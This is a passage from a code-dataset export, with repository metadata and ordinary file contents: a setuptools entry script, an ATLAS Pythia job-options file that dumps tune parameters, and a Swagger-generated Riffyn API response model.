print("{} {} {} {} {}".format(d, t1, t2, t3, t4))
main()
| [
"he.andrew.mail@gmail.com"
] | he.andrew.mail@gmail.com |
715b78f5c54afb7db2f05ce2265f7dd90eed0a8d | 76a68cbbaf9c4aa15ec9b59455e33c6784229bdb | /MECS_gym/venv/bin/easy_install-3.5 | 82fa72283113e10abd217602c94e6c52cf7de730 | [
"MIT"
] | permissive | Python-Repository-Hub/KAIST_MEC_simulator | e63f704bd20b36fd1a8ffa30b7e736c50351d1cc | 26556a8216e2bbdfa5c5ee377e9deb51ea7602f8 | refs/heads/master | 2023-08-30T06:57:39.003766 | 2021-11-18T16:16:48 | 2021-11-18T16:16:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | 5 | #!/home/wisrl/Downloads/baselines-master_final_ppo2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.5')()
)
| [
"elasteam88@gmail.com"
] | elasteam88@gmail.com |
63672e5230782b6ef6729b1836332595ccc3ecfd | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Generators/Pythia_i/share/PYTUNE_pprintout.py | 564fee7303a86b2b89df12767930b5600ed7390c | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | #______________________________________________________________________________________________________________________
# author: liza.mijovic@_nospam_cern.ch
#
# jO effect: dump the values of all parameters PYTUNE can set - this jopts are meant for runnig with GET_TUNE_params.sh
#
# ______________________________________________________________________________________________________________________
from AthenaCommon.AlgSequence import AlgSequence
topAlg = AlgSequence("TopAlg")
from Pythia_i.Pythia_iConf import Pythia
topAlg += Pythia()
Pythia = topAlg.Pythia
theApp.EvtMax = 0
Pythia.Tune_Name="ATLAS_-1"
Pythia.Direct_call_to_pytune=REPIND
# if one want the call to be equivalen to Pythia.Tune_Name="PYTUNE_XXX"
# the ATLAS stable particles convention should also be added
Pythia.PygiveCommand += [ "mstj(22)=2" ]
PYDAT1_PARAMS=[ "MSTU", "PARU", "MSTJ", "PARJ" ]
PYPARS_PARAMS=[ "MSTP", "PARP", "MSTI", "PARI" ]
PYTUNE_PARAMS=PYDAT1_PARAMS+PYPARS_PARAMS
PQ_LIST=[]
for i in PYTUNE_PARAMS:
PQ_LIST+=[i+"("+repr(x)+")=" for x in range(1,201)]
Pythia.PygiveCommand += PQ_LIST
Pythia.Param_Query_AfterInit += PQ_LIST
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
f43e0ddb2fcdcb7dc177f350b6b4392c4c8151cf | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/inline_response2009.py | d0159adf2ba606c4d7868ece17e12f892cd52bd6 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,874 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. 
A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class InlineResponse2009(object):
    """Swagger-generated response model for a resource-type deletion.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.

    Attributes:
        swagger_types (dict): maps attribute name -> attribute type.
        attribute_map (dict): maps attribute name -> JSON key in definition.
    """

    # Attribute name -> declared swagger type.
    swagger_types = {
        'result': 'str'
    }

    # Attribute name -> JSON key used on the wire.
    attribute_map = {
        'result': 'result'
    }

    def __init__(self, result=None):  # noqa: E501
        """Build an InlineResponse2009 model (defined in Swagger).

        :param result: optional status message; only assigned when not None.
        """
        self._result = None
        self.discriminator = None
        if result is not None:
            self.result = result

    @property
    def result(self):
        """Gets the result of this InlineResponse2009.  # noqa: E501

        Resource Type successfully deleted.  # noqa: E501

        :return: The result of this InlineResponse2009.
        :rtype: str
        """
        return self._result

    @result.setter
    def result(self, value):
        """Sets the result of this InlineResponse2009.

        Resource Type successfully deleted.

        :param value: The result of this InlineResponse2009.
        :type: str
        """
        self._result = value

    def to_dict(self):
        """Returns the model properties as a dict."""
        def _serialize(item):
            # Recursively convert nested models (anything exposing to_dict),
            # including models held inside lists and dict values.
            if isinstance(item, list):
                return [x.to_dict() if hasattr(x, "to_dict") else x
                        for x in item]
            if hasattr(item, "to_dict"):
                return item.to_dict()
            if isinstance(item, dict):
                return {k: (v.to_dict() if hasattr(v, "to_dict") else v)
                        for k, v in item.items()}
            return item

        out = {name: _serialize(getattr(self, name))
               for name in self.swagger_types}
        # Generated models may subclass dict; merge any extra items in.
        if issubclass(InlineResponse2009, dict):
            for key, value in self.items():
                out[key] = value
        return out

    def to_str(self):
        """Returns the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if isinstance(other, InlineResponse2009):
            return self.__dict__ == other.__dict__
        return False

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"jaceys.tan@gmail.com"
] | jaceys.tan@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.